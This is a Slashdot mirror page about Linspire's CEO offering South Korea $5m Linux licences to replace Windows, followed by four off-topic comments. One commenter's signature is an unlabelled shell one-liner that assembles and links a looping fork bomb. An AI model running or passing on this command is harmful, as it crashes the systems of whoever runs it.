Slashdot Mirror


Linspire CEO Offers S. Korea To Replace Windows

Spy der Mann writes "Noticing the Microsoft threat to withdraw Windows from South Korea, the Linspire CEO, Kevin Carmony, just offered to license every computer in the country with Linspire, for just $5m. This would be around 10 cents / person. 'South Korea could save around a quarter of a billion dollars. More importantly, however, it would break South Korea loose from the monopolistic grasp of Microsoft, which the country currently finds itself under,'"

4 of 279 comments (clear)

  1. Re:energy is liberated through blasphemy by Hakubi_Washu · · Score: 0, Offtopic

    You know, AC, one has to believe in the first place in order to commit blasphemy... Otherwise it's just trolling :-P

  2. Re:energy is liberated through blasphemy by empaler · · Score: 0, Offtopic

    You surf at -1 for this? Hardly worth the time it takes to skim.

  3. Re:energy is liberated through blasphemy by sonamchauhan · · Score: 0, Offtopic

    not true actually...

  4. Re:A mixed bag by Hal_Porter · · Score: 0, Offtopic

    OMG Zerg rush!!111 Kekekekek!11!!

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;